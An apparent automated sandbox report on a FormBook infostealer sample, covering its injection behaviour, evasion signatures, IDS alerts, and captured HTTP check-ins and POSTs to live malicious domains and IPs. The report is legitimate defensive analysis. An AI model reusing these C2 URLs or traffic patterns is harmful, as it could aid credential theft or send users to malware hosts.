Windows Analysis Report
uI1A364y2P.exe

Overview

General Information

Sample name: uI1A364y2P.exe
renamed because original name is a hash value
Original sample name: 06c76e9f520afe4c48a42bc56781f143cbb4d00d9d2da82ed917d52fb399fc61.exe
Analysis ID: 1618201
MD5: 78a9ad79bf5cfb3e640e3ca7eb285b76
SHA1: 05a65af8ba898d5bc35cc4d05bf8e10a467565b0
SHA256: 06c76e9f520afe4c48a42bc56781f143cbb4d00d9d2da82ed917d52fb399fc61
Tags: exe, tumbetgirislinki-fit, user-JAMESWT_MHT

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • uI1A364y2P.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\uI1A364y2P.exe" MD5: 78A9AD79BF5CFB3E640E3CA7EB285B76)
    • aspnet_compiler.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 7608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • zk0NoejtsplNyT.exe (PID: 5472 cmdline: "C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\elWqCMKd.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • runonce.exe (PID: 7928 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
          • zk0NoejtsplNyT.exe (PID: 2940 cmdline: "C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\mNbX16zvQChK34.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 3452 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.aspnet_compiler.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process started, Author: frack113, Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\uI1A364y2P.exe", ParentImage: C:\Users\user\Desktop\uI1A364y2P.exe, ParentProcessId: 7488, ParentProcessName: uI1A364y2P.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 7544, ProcessName: aspnet_compiler.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-02-18T18:35:35.689100+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 61069 | 162.218.30.235 | 80 | TCP
                2025-02-18T18:35:59.508402+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 61073 | 103.106.67.112 | 80 | TCP
                2025-02-18T18:36:13.368671+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 61077 | 104.21.96.1 | 80 | TCP
                2025-02-18T18:36:27.566024+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 61081 | 104.21.48.1 | 80 | TCP
                2025-02-18T18:35:51.601364+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61070 | 103.106.67.112 | 80 | TCP
                2025-02-18T18:35:54.199286+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61071 | 103.106.67.112 | 80 | TCP
                2025-02-18T18:35:56.962404+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61072 | 103.106.67.112 | 80 | TCP
                2025-02-18T18:36:06.088409+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61074 | 104.21.96.1 | 80 | TCP
                2025-02-18T18:36:08.019403+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61075 | 104.21.96.1 | 80 | TCP
                2025-02-18T18:36:11.180744+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61076 | 104.21.96.1 | 80 | TCP
                2025-02-18T18:36:19.363337+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61078 | 104.21.48.1 | 80 | TCP
                2025-02-18T18:36:21.623596+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61079 | 104.21.48.1 | 80 | TCP
                2025-02-18T18:36:24.986551+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61080 | 104.21.48.1 | 80 | TCP
                2025-02-18T18:36:33.901359+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61082 | 134.122.133.80 | 80 | TCP
                2025-02-18T18:36:36.935560+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 61083 | 134.122.133.80 | 80 | TCP

                AV Detection

                Source: uI1A364y2P.exe, Avira: detected
                Source: http://www.seasay.xyz/c9ts/?rTuLCZ7=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7Qzpj06nGEzNEnovnPrsEb7KL1brrzNpzul2VEXvMTZ1g4GQAuWECb3v8&6pUT9=BnsLTbOHvZg4E, Avira URL Cloud: Label: malware
                Source: http://www.kjuw.party/e0jv/, Avira URL Cloud: Label: malware
                Source: http://www.lucynoel6465.shop/jgkl/?rTuLCZ7=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+IqhGLYCnqltFYDkW9rwSVxH+ZM2/XnYhAogS2Zyd/o6zK+cbwINARG&6pUT9=BnsLTbOHvZg4E, Avira URL Cloud: Label: malware
                Source: https://www.seasay.xyz/c9ts/?rTuLCZ7=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExA, Avira URL Cloud: Label: malware
                Source: http://www.l63339.xyz/vhr7/?6pUT9=BnsLTbOHvZg4E&rTuLCZ7=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0DPw8ZLv8n+jVvEkjzRDyf1FFJKGTm/x08ZOhgwkEPf0hvFuhdZt1S6, Avira URL Cloud: Label: malware
                Source: http://www.tumbetgirislinki.fit/k566/?rTuLCZ7=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MdLjldftk+pS4j839nhzGVAWPSO5aQYaeXSj4P+pnuEIGWZVsh7JvfN&6pUT9=BnsLTbOHvZg4E, Avira URL Cloud: Label: malware
                Source: uI1A364y2P.exe, ReversingLabs: Detection: 62%
                Source: uI1A364y2P.exe, Virustotal: Detection: 51%
                Source: Yara match, File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.2622738562.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.2621242417.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2622801830.0000000003C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: uI1A364y2P.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: uI1A364y2P.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: CZXSYYS.pdb source: uI1A364y2P.exe
                Source: Binary string: runonce.pdbGCTL source: aspnet_compiler.exe, 00000004.00000002.1896688737.0000000001197000.00000004.00000020.00020000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000003.1881603043.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.1897043771.0000000001730000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1896057355.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.0000000004590000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.000000000472E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1900296225.00000000043E3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.1897043771.0000000001730000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 00000007.00000003.1896057355.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.0000000004590000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.000000000472E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1900296225.00000000043E3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: aspnet_compiler.exe, 00000004.00000002.1896688737.0000000001197000.00000004.00000020.00020000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000003.1881603043.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zk0NoejtsplNyT.exe, 00000006.00000002.2621245081.00000000004FF000.00000002.00000001.01000000.00000008.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2621245434.00000000004FF000.00000002.00000001.01000000.00000008.sdmp
                Source: C:\Windows\SysWOW64\runonce.exe, Code function: 7_2_0036C8D0 FindFirstFileW,FindNextFileW,FindClose (7_2_0036C8D0)
                Source: C:\Windows\SysWOW64\runonce.exe, Code function: 4x nop then xor eax, eax (7_2_00359EF0)
                Source: C:\Windows\SysWOW64\runonce.exe, Code function: 4x nop then mov ebx, 00000004h (7_2_043E04E8)

                Networking

                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:61073 -> 103.106.67.112:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61071 -> 103.106.67.112:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:61069 -> 162.218.30.235:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61079 -> 104.21.48.1:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61076 -> 104.21.96.1:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61074 -> 104.21.96.1:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61070 -> 103.106.67.112:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61080 -> 104.21.48.1:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:61077 -> 104.21.96.1:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61083 -> 134.122.133.80:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61072 -> 103.106.67.112:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:61081 -> 104.21.48.1:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61075 -> 104.21.96.1:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61082 -> 134.122.133.80:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61078 -> 104.21.48.1:80
                Source: DNS query: www.l63339.xyz
                Source: DNS query: www.seasay.xyz
                Source: global traffic, TCP traffic: 192.168.2.7:60862 -> 1.1.1.1:53
                Source: Joe Sandbox View, IP Address: 104.21.48.1
                Source: Joe Sandbox View, IP Address: 103.106.67.112
                Source: unknown, TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic, HTTP traffic detected:
                  GET /vhr7/?6pUT9=BnsLTbOHvZg4E&rTuLCZ7=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0DPw8ZLv8n+jVvEkjzRDyf1FFJKGTm/x08ZOhgwkEPf0hvFuhdZt1S6 HTTP/1.1
                  Host: www.l63339.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global traffic, HTTP traffic detected:
                  GET /c9ts/?rTuLCZ7=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7Qzpj06nGEzNEnovnPrsEb7KL1brrzNpzul2VEXvMTZ1g4GQAuWECb3v8&6pUT9=BnsLTbOHvZg4E HTTP/1.1
                  Host: www.seasay.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global traffic, HTTP traffic detected:
                  GET /k566/?rTuLCZ7=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MdLjldftk+pS4j839nhzGVAWPSO5aQYaeXSj4P+pnuEIGWZVsh7JvfN&6pUT9=BnsLTbOHvZg4E HTTP/1.1
                  Host: www.tumbetgirislinki.fit
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global traffic, HTTP traffic detected:
                  GET /jgkl/?rTuLCZ7=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+IqhGLYCnqltFYDkW9rwSVxH+ZM2/XnYhAogS2Zyd/o6zK+cbwINARG&6pUT9=BnsLTbOHvZg4E HTTP/1.1
                  Host: www.lucynoel6465.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global traffic, DNS traffic detected: DNS query: time.windows.com
                Source: global traffic, DNS traffic detected: DNS query: www.l63339.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.seasay.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.tumbetgirislinki.fit
                Source: global traffic, DNS traffic detected: DNS query: www.lucynoel6465.shop
                Source: global traffic, DNS traffic detected: DNS query: www.kjuw.party
                Source: unknown, HTTP traffic detected:
                  POST /c9ts/ HTTP/1.1
                  Host: www.seasay.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.seasay.xyz
                  Referer: http://www.seasay.xyz/c9ts/
                  Content-Length: 220
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Tue, 18 Feb 2025 17:36:07 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: no-cache, no-store, must-revalidate
                  Pragma: no-cache
                  Expires: 0
                  cf-cache-status: DYNAMIC
                  Server: cloudflare
                  CF-RAY: 913fc70f88a745ef-DFW
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Tue, 18 Feb 2025 17:36:13 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Accept-Ranges: bytes
                  Cache-Control: no-cache, no-store, must-revalidate
                  Pragma: no-cache
                  Expires: 0
                  cf-cache-status: DYNAMIC
                  Server: cloudflare
                  CF-RAY: 913fc730c8dce813-DFW
                  alt-svc: h3=":443"; ma=86400
                Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Tue, 18 Feb 2025 17:36:19 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  cf-cache-status: DYNAMIC
                  Server: cloudflare
                  CF-RAY: 913fc755fc641f24-DEN
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Tue, 18 Feb 2025 17:36:21 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  cf-cache-status: DYNAMIC
                  Server: cloudflare
                  CF-RAY: 913fc765af69a316-YUL
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Tue, 18 Feb 2025 17:36:24 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  cf-cache-status: DYNAMIC
                  Server: cloudflare
                  CF-RAY: 913fc77948e97651-SEA
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Tue, 18 Feb 2025 17:36:27 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  cf-cache-status: DYNAMIC
                  Server: cloudflare
                  CF-RAY: 913fc78998554c94-MSP
                  alt-svc: h3=":443"; ma=86400
                Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Content-Length: 148
                  Content-Type: text/html
                  Date: Tue, 18 Feb 2025 17:36:33 GMT
                  Etag: "6746afef-94"
                  Server: nginx
                  X-Cache: BYPASS
                  Connection: close
                Source: global traffic, HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Content-Length: 148
                  Content-Type: text/html
                  Date: Tue, 18 Feb 2025 17:36:36 GMT
                  Etag: "6746afef-94"
                  Server: nginx
                  X-Cache: BYPASS
                  Connection: close
                Source: runonce.exe, 00000007.00000002.2624897097.00000000052C8000.00000004.10000000.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2623271598.0000000003118000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: zk0NoejtsplNyT.exe, 0000000A.00000002.2624771896.0000000004E9B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kjuw.party
                Source: zk0NoejtsplNyT.exe, 0000000A.00000002.2624771896.0000000004E9B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kjuw.party/e0jv/
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: runonce.exe, 00000007.00000003.2089587672.00000000075D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: zk0NoejtsplNyT.exe, 0000000A.00000002.2623271598.0000000002F86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.seasay.xyz/c9ts/?rTuLCZ7=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExA
                Source: runonce.exe, 00000007.00000002.2624897097.0000000004FA4000.00000004.10000000.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2623271598.0000000002DF4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2205653441.0000000037054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/
                Source: runonce.exe, 00000007.00000002.2624897097.0000000004FA4000.00000004.10000000.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2623271598.0000000002DF4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2205653441.0000000037054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

                E-Banking Fraud

                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
